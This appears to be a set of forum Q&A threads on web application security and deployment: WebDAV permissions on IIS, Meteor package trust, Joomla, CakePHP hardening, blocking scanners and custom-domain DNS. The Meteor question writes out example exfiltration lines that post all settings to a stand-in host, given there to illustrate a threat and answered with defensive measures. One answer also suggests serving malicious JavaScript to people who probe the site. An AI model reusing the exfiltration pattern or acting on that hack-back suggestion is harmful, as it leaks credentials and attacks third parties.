WebDAV authentication performance / alternatives - IIS

I am trying to find out how suitable WebDAV is for a product being developed by the company I work at.
Our needs seem to exceed what WebDAV has to offer, and I'm trying to find out whether my theory is correct and, if so, how we could work around it.
I am using the WebDAV package that you can install through the "Add/Remove Windows Features" dialog.
The problem is that we want to be able to set permissions on each file, and since we can access and change authoring rules from code, this is more or less possible.
Authoring rules seem to apply to folders rather than individual files, but this could be worked around by giving each file its own folder (although it's a bit ugly).
To me this solution seems very inefficient, mainly because the authoring rules are all placed in a single list, which means that for every file request the server has to loop through the entire list, and the list grows with every file added to the server.
My thought is that we could build some kind of "proxy" that checks permissions in a more efficient way and, if the user has permission to access the file, simply forwards the request to the WebDAV server.
This might also be inefficient, since we would have to run an application managing the connection between the user and the WebDAV server, but at least the cost per request wouldn't keep growing as files are added to the server.
I guess this leads to the questions:
Is WebDAV at all suitable for more complex permissions?
Is there some part of WebDAV that I have missed which solves this problem?
If so, would it be better to go with the internal solution, or should we build an external one?
If not WebDAV, is there a better solution? (We want all the nice file-locking, version-control and Office-integration features.)

Use an HttpModule to apply your authorization rules.
system.webServer/modules has an attribute runManagedModulesForWebDavRequests
(note: this is not the same as runAllManagedModulesForAllRequests).
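A minimal sketch of what that could look like in web.config; the FilePermissionModule name and type are hypothetical placeholders for your own managed IHttpModule:

<system.webServer>
  <modules runManagedModulesForWebDavRequests="true">
    <!-- hypothetical module that authorizes each request against your own per-file permission store -->
    <add name="FilePermissionModule" type="MyCompany.Web.FilePermissionModule" />
  </modules>
</system.webServer>

The module would handle AuthorizeRequest, look the requested path up in an indexed store (a dictionary or database lookup instead of a scan over all authoring rules), and end the response with a 403 when the user lacks access.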

Forget about IIS.
Forget about pure WebDAV.
Build or get Apache + mod_dav_svn.
Use path-based authorization in SVN, which can enforce rules on a per-file basis if needed.
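For reference, path-based authorization is configured in an authz file read by mod_authz_svn; a minimal sketch, with made-up repository, path and user names:

[docs:/contracts/2014/big-deal.pdf]
alice = rw
bob = r
carol =

Rules can target individual files as well as directories, so the folder-per-file workaround from the question isn't needed.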

How can I prevent 3rd-party packages from having direct access to Meteor.settings?

I want to be able to protect my settings from 3rd parties.
Scenario:
I have sensitive data in my Meteor.settings file, especially in production, because that is the current best-practice place to put them.
I use a 3rd party meteor package such as iron:router, but possibly one by a lesser known author.
One of the 3rd party packages looks up my Meteor.settings and does an HTTP post on which some of my settings are sent along.
HTTP.post('http://evil.haxor', Meteor.settings) # all ur settings
Boom. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my settings might be loaded in and eval'd so I don't even see the string "Meteor.settings" in the source of the package.
I've tested, and these two things are allowed in 3rd-party packages:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given everything on their plates (Windows support, a non-Mongo DB). I just want to be able to provide this level of security to my company; I think it would concern their auditors to discover this level of openness. Otherwise I fear I'm stuck manually security-auditing every package I use.
Thank you for your consideration!
Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem, and the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should, be a notion of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the fact that settings are (easily) modifiable at runtime, could be addressed by making the settings object read-only using ES5 properties.
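For instance, something along these lines in server startup code would at least make tampering fail (a sketch only; it makes the object read-only but does nothing to stop a package from reading the values):

// Recursively freeze the settings object; later writes then throw in strict mode
// (and are silently ignored otherwise).
function deepFreeze(obj) {
  Object.keys(obj).forEach(function (key) {
    var value = obj[key];
    if (value && typeof value === 'object') {
      deepFreeze(value);
    }
  });
  return Object.freeze(obj);
}

if (Meteor.isServer) {
  deepFreeze(Meteor.settings);
}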
A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.
I see 2 (partial) solutions:
Set up a firewall with outbound rules and logging (a rough sketch follows this list). Unfortunately, if your application communicates with any sort of social network (Facebook, Twitter), the firewall idea will not handle malware that uses Twitter as a way to transmit data. But maybe it would help?
Lock down DNS resolution and provide a whitelist of allowed lookups. This way you could spot when the app starts trying to communicate with 'evil.haxor'.
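As a sketch of the first idea, a default-deny outbound policy with logging could look like this with iptables; the addresses are placeholders for your own resolver and known API endpoints:

iptables -P OUTPUT DROP
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT   # replies to inbound requests
iptables -A OUTPUT -p udp --dport 53 -d 203.0.113.53 -j ACCEPT      # only your own DNS resolver
iptables -A OUTPUT -p tcp --dport 443 -d 203.0.113.80 -j ACCEPT     # a known external API endpoint
iptables -A OUTPUT -j LOG --log-prefix "OUTBOUND-DROP: "            # log everything else before the policy drops it

Pinning DNS to a single resolver you control also gives you the lookup log you would need for the whitelist idea in the second point.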
There are other, more advanced detectors, but at some point a hacker is going to go after the other services running on the box rather than try to modify your code.
Good luck. And it's good to be paranoid, because they really are out to get you.

Is Joomla user management safe enough to handle confidential data?

How difficult or easy is it to break into the Joomla backend and access pages that are set to be accessible only by selected Joomla users of the website? Is it safe enough to rely on Joomla's user management system?
Yes, Joomla is quite a secure system by itself. However, you have to be careful with third-party extensions, always track update news for all components (including the core) you have installed, and use your judgement about updating them. Usually security issues are spotted quite quickly, so you have time to react before a successful attack.
Another thing to keep in mind is proactive defense with all the means you have at hand: this includes .htaccess and .htpasswd protection, and it is also a good idea to restrict FTP access to local IPs only and use SFTP instead.
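As a sketch, an extra HTTP-auth layer in front of the admin area can be a small administrator/.htaccess like this (the file paths and realm name are placeholders):

AuthType Basic
AuthName "Restricted area"
AuthUserFile /home/example/.htpasswd
Require valid-user

with the matching account created by htpasswd -c /home/example/.htpasswd someadmin. An attacker then has to get past Apache before even seeing the Joomla login form.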
Also check out the security extensions on the JED; the ones that prevent high-level DDoS attacks and extend admin page access protection might also be helpful. Usually they are simple modules or plugins.
And yes, do not forget to change the default username for the superuser, and change all passwords (FTP, superuser, MySQL, htpasswd) on a regular basis.
Follow these simple rules and you will be fine, at least most of the time.
While Joomla security is fairly good, you need to keep up with the patches and, as dmi3y mentioned, you need to watch the third party extensions.
When it comes to information security, nothing is ever perfect. This solution may or may not be appropriate depending on the type of information that you are looking to secure, the number of users accessing it and how you manage the user rights.

What are the things that must be taken care of before deploying a CakePHP website?

I'm just done with a CakePHP website, but I'm still in doubt about what things I must take care of before making this website live.
It is a big application that requires users to register, log in and manage their accounts. Any sort of help is appreciated.
Thanks.
There is a section in the CakePHP book answering directly that:
http://book.cakephp.org/2.0/en/deployment.html
Harden the installation, switch to production mode if you use different SQL services for development and production, disable PHP error reporting, enable caching, disable and remove all client-side debugging such as DebugKit, and make sure any comments in your HTML will not give hackers an advantage, like printed variables.
PHP frameworks can be resource hogs. I think the last but most important step is to test the server with some generated traffic. There are services that can do this for you. You may need to separate resources or set up an additional server for SQL if you expect a lot of traffic.
There may be a couple of other things you might want to do; just browse your core.php and bootstrap.php and make sure everything is configured correctly for the production environment.
Here are some common but important things to take care of before making a CakePHP website live.
Check read/write permissions on the desired folders.
Check that the images, JS files and CSS files your website needs are present.
Check that the tmp folder is writable and clear the cache.
Set the debug level to 0 (see the snippet after this list).
Make sure database connectivity works fine.
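As a small sketch of the debug item above: in CakePHP 2.x that setting lives in app/Config/core.php, and production should ship with

Configure::write('debug', 0); // 0 = production: no errors or stack traces shown to visitors

since the higher debug levels print errors and debug output straight into the page.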

Best way to stop "XSS" hackers and similar

Yesterday I noticed, by looking into my Apache error log, that someone tried to get access to the website by requesting a lot of URLs like:
mywebsite.com/phpmyadmin
mywebsite.com/dbadmin
mywebsite.com/mysqladmin
mywebsite.com/foo.php#some-javascript
...
This caused a lot of 404 errors. What's the best way to stop them from doing so?
I thought about creating a fake phpmyadmin directory with some PHP code that bans their IP address from my website for about 12 to 24 hours when they access it.
Is there a better way to deal with this kind of visitor?
You should take a look at Fail2ban; it's pretty easy to set up for Apache.
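For example, a jail along these lines in jail.local will ban an IP after repeated hits like the ones in your error log (a sketch; check which of the stock Apache filters actually matches the entries you are seeing):

[apache-noscript]
enabled  = true
port     = http,https
filter   = apache-noscript
logpath  = /var/log/apache2/error.log
maxretry = 6
bantime  = 43200

bantime is in seconds, so 43200 gives roughly the 12-hour ban you had in mind.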
You can't really prevent people from trying these sorts of attacks. The best you can do is log all these sorts of attempts like you're currently doing and maybe implement some sort of temporary blacklisting.
The security of your site shouldn't depend on people not trying to do these sorts of attacks, since you will never be able to fully prevent them.
If none of those paths exist, they're not going to be able to do anything. You just have to worry about them accessing parts that do exist and that you don't want them to access, or exploiting poorly written scripts with XSS holes in them.
You could make it harder on them by checking whether they're trying to access a commonly probed path (like phpMyAdmin's default path) and using an alternate 404 page that has malicious JavaScript on it, or something along those lines.

Allowing users to point their domains to a web-based application?

I'm possibly developing a web-based application that allows users to create individual pages. I would like users to be able to use their own domains/sub-domains to access the pages.
So far I've considered:
A) Getting users to forward with masking to their pages. Probably the most inefficient option; having used this before myself, I'm pretty sure it iframes the page (though I'm not entirely sure).
B) Having the users download certain files, which then make calls to the server for their specific account settings via a user key of some sort. The most efficient in my mind at the moment; however, this requires letting users see a fair degree of source code, something I'd rather not do if possible.
C) Getting the users to add a CNAME record to their DNS settings, which is semi-inefficient (most of these users will be used to uploading files via FTP, hence why B is the most efficient option), but at the same time means no source code will be seen by them.
The downside is, I have no idea how to implement C or what would be needed.
I got the idea from: http://unbounce.com/features/custom-urls/.
I'm wondering which of the three methods I should use to allow custom URLs for users. I would prefer C, but I have no idea how to implement it (so I'm partly asking how), and whether the time spent learning how to get that kind of functionality set up would even be worth it.
Any answers/opinions/comments would be very much appreciated :)!
Option C is called wildcard DNS: I've linked to a writeup that gives an example of how to do it using Apache. Other web server setups should be able to do this as well: for what you want it is well worth it.
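A rough sketch of how this works in practice, assuming a hypothetical service at app.example.com. On the customer's side the DNS record is just a CNAME (names made up):

pages.customer.com.    IN    CNAME    app.example.com.

On your side, with Apache, a catch-all virtual host hands every Host header to the application, which maps the domain to the right account:

<VirtualHost *:80>
    ServerName app.example.com
    ServerAlias *
    DocumentRoot /var/www/app
    # The application reads the Host header (e.g. pages.customer.com)
    # and looks it up in its own table of customer domains.
</VirtualHost>

The wildcard ServerAlias makes this vhost answer for any domain; alternatively, the first virtual host defined for the address already acts as the default for unmatched hostnames.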
